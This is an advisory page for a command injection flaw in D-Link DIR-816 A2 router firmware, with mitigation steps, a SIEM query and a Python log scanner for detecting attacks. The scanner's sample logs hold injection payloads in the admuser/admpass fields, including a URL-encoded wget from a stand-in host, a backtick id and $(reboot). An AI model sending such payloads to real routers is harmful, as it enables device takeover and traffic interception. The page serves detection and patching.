CVE-2022-28915

9.8 CRITICAL

📋 TL;DR

This CVE describes a command injection vulnerability in D-Link DIR-816 A2 routers that lets an attacker execute arbitrary OS commands on the device. The admuser and admpass parameters of the administrator-credential form (handled by /goform/setSysAdm) reach a shell without sanitization, so shell metacharacters embedded in either value are executed by the firmware with the web server's privileges. This affects users of D-Link DIR-816 A2 routers running vulnerable firmware versions.

💻 Affected Systems

Products:
  • D-Link DIR-816 A2
Versions: v1.10CNB04 and potentially earlier versions
Operating Systems: Embedded Linux firmware
Default Config Vulnerable: ⚠️ Yes
Notes: The web administration interface must be reachable by the attacker. On a default configuration it is reachable from every host on the LAN (and from the WAN if remote management is enabled), and exploitation does not require a login.

📦 What is this software?

The D-Link DIR-816 is a consumer wireless router. The A2 hardware revision runs an embedded Linux firmware that is administered through a web interface whose form handlers live under /goform/; setSysAdm is the handler that stores the administrator username and password, which is where the vulnerable admuser and admpass parameters are processed.
⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device compromise: the attacker installs a persistent backdoor, intercepts or modifies all traffic passing through the router, pivots to the internal network, or bricks the device.

🟠 Likely Case

The attacker gains administrative control of the router and uses it to change DNS settings, redirect traffic, or harvest credentials from connected devices.

🟢 If Mitigated

Limited impact if the administrative interface is reachable only from a restricted management network and the router sits behind a firewall with network segmentation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires network access to the administrative interface but does not require valid credentials, which is consistent with the 9.8 (no privileges required) score above. Proof-of-concept code is publicly available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not identified here; check the vendor bulletin for DIR-816 A2 firmware newer than v1.10CNB04. If the vendor lists this hardware revision as end-of-life with no fix, treat the workarounds below as permanent and plan a replacement.

Vendor Advisory: https://www.dlink.com/en/security-bulletin/

Restart Required: Yes

Instructions:

1. Visit the D-Link support site.
2. Download the latest firmware for the DIR-816 A2.
3. Log into the router admin interface.
4. Navigate to System Tools > Firmware Upgrade.
5. Upload and apply the new firmware.
6. Reboot the router.
7. Confirm the firmware version shown under Status > Device Info is newer than v1.10CNB04.

🔧 Temporary Workarounds

Disable Remote Administration (all versions)

Prevent external access to the administrative interface. This removes the Internet-facing exposure but does nothing against an attacker already on the LAN, since no login is needed.

Log into router admin > Advanced > Remote Management > Disable

Restrict Administrative Access (all versions)

Limit administrative interface access to specific management IP addresses.

Log into router admin > Advanced > Firewall > Access Control

🧯 If You Can't Patch

  • Isolate the router's administrative interface on a separate management VLAN with strict firewall rules, and keep guest and IoT devices on networks that cannot reach it.
  • Monitor for unusual administrative access, especially POST requests to /goform/setSysAdm from hosts that are not the designated management station.

🔍 How to Verify

Check if Vulnerable:

Check firmware version in router admin interface under Status > Device Info

Check Version:

curl -s http://router-ip/status.asp | grep Firmware

Verify Fix Applied:

Verify firmware version is updated beyond v1.10CNB04

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /goform/setSysAdm whose admuser or admpass values contain shell metacharacters (; | & ` $( ), possibly URL-encoded as %3B, %7C, %26, %60, %24%28
  • Administrator credentials changed without an operator action (setSysAdm is the credential-change handler, so a successful attack may also lock out the legitimate administrator)

Network Indicators:

  • Unusual outbound connections from router
  • DNS changes not initiated by administrator

SIEM Query:

The router itself does not log request bodies, so this only works on an upstream reverse proxy, IDS, or packet capture that records the POST parameters; decode URL-encoding before matching.

source="router.log" uri="/goform/setSysAdm" (admuser="*;*" OR admuser="*|*" OR admuser="*`*" OR admuser="*$(*" OR admpass="*;*" OR admpass="*|*" OR admpass="*`*" OR admpass="*$(*")
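The detection logic above, run over sample log lines, as an added example for this page (not code from D-Link or from any published PoC). It assumes an upstream proxy or IDS that records the POST body in the constructed format shown in SAMPLE_LOGS; the parameter names admuser and admpass come from the CVE description, everything else is illustrative.

```python
"""Flag command-injection attempts against /goform/setSysAdm in access logs.

Added example for this page, not vendor code. Assumed log format
(constructed): "<src_ip> <method> <path> <url-encoded body>". The router
does not log POST bodies itself, so the source must be a proxy/IDS/pcap.
"""
import re
from urllib.parse import parse_qs, unquote_plus

TARGET_PATH = "/goform/setSysAdm"
WATCHED_PARAMS = ("admuser", "admpass")  # from the CVE description

# Characters that terminate or chain a command when a field is interpolated
# into a shell string: ; | & ` newline $( ${ and redirections.
METACHAR_RE = re.compile(r"[;|&`\n]|\$\(|\$\{|>|<")

LINE_RE = re.compile(r"^(?P<src>\S+) (?P<method>\S+) (?P<path>\S+) (?P<body>.*)$")

# Constructed sample lines: one benign credential change, three injection
# attempts with different metacharacters, and an unrelated GET.
SAMPLE_LOGS = [
    "203.0.113.5 POST /goform/setSysAdm admuser=admin&admpass=S3cret!",
    "203.0.113.9 POST /goform/setSysAdm admuser=admin%3Bwget+http%3A%2F%2F198.51.100.7%2Fx&admpass=a",
    "203.0.113.9 POST /goform/setSysAdm admuser=admin&admpass=%60id%60",
    "192.0.2.44 POST /goform/setSysAdm admuser=a&admpass=b%24%28reboot%29",
    "192.0.2.10 GET /status.asp -",
]


def suspicious_params(body: str) -> dict:
    """Return {param: decoded_value} for watched params containing metacharacters.

    parse_qs URL-decodes once; a second unquote_plus catches double-encoded
    payloads (%253B -> %3B -> ;) aimed at a naive filter. A legitimate
    password that literally contains a %XX sequence may therefore be flagged;
    that is an acceptable false positive for a rule on a credential endpoint.
    """
    fields = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for value in fields.get(name, []):
            decoded = unquote_plus(value)
            if METACHAR_RE.search(decoded):
                hits[name] = decoded
    return hits


def scan(lines):
    """Return one alert per POST to the target handler with a suspicious field."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != TARGET_PATH:
            continue
        hits = suspicious_params(m["body"])
        if hits:
            alerts.append({"src": m["src"], "params": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(f"ALERT src={alert['src']} params={alert['params']}")
```

Run stand-alone it prints three alerts (the benign credential change and the GET are ignored). The decode-before-match step is the part the one-line SIEM query cannot do: a wildcard on `;` never sees `%3B`.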
